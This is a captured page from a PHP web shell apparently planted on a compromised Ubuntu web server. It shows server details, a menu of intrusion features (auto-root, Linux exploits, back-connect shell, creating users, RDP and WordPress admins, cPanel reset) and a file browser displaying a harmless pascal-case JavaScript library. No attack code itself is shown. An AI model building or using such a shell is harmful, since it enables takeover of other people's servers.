Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
pascal-case /
dist /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
289
B
-rw-rw-rw-
index.js
1.01
KB
-rw-rw-rw-
index.js.map
1.5
KB
-rw-rw-rw-
index.spec.d.ts
11
B
-rw-rw-rw-
index.spec.js
903
B
-rw-rw-rw-
index.spec.js.map
1.46
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.pascalCase = exports.pascalCaseTransformMerge = exports.pascalCaseTransform = void 0; var tslib_1 = require("tslib"); var no_case_1 = require("no-case"); function pascalCaseTransform(input, index) { var firstChar = input.charAt(0); var lowerChars = input.substr(1).toLowerCase(); if (index > 0 && firstChar >= "0" && firstChar <= "9") { return "_" + firstChar + lowerChars; } return "" + firstChar.toUpperCase() + lowerChars; } exports.pascalCaseTransform = pascalCaseTransform; function pascalCaseTransformMerge(input) { return input.charAt(0).toUpperCase() + input.slice(1).toLowerCase(); } exports.pascalCaseTransformMerge = pascalCaseTransformMerge; function pascalCase(input, options) { if (options === void 0) { options = {}; } return no_case_1.noCase(input, tslib_1.__assign({ delimiter: "", transform: pascalCaseTransform }, options)); } exports.pascalCase = pascalCase; //# sourceMappingURL=index.js.map
Close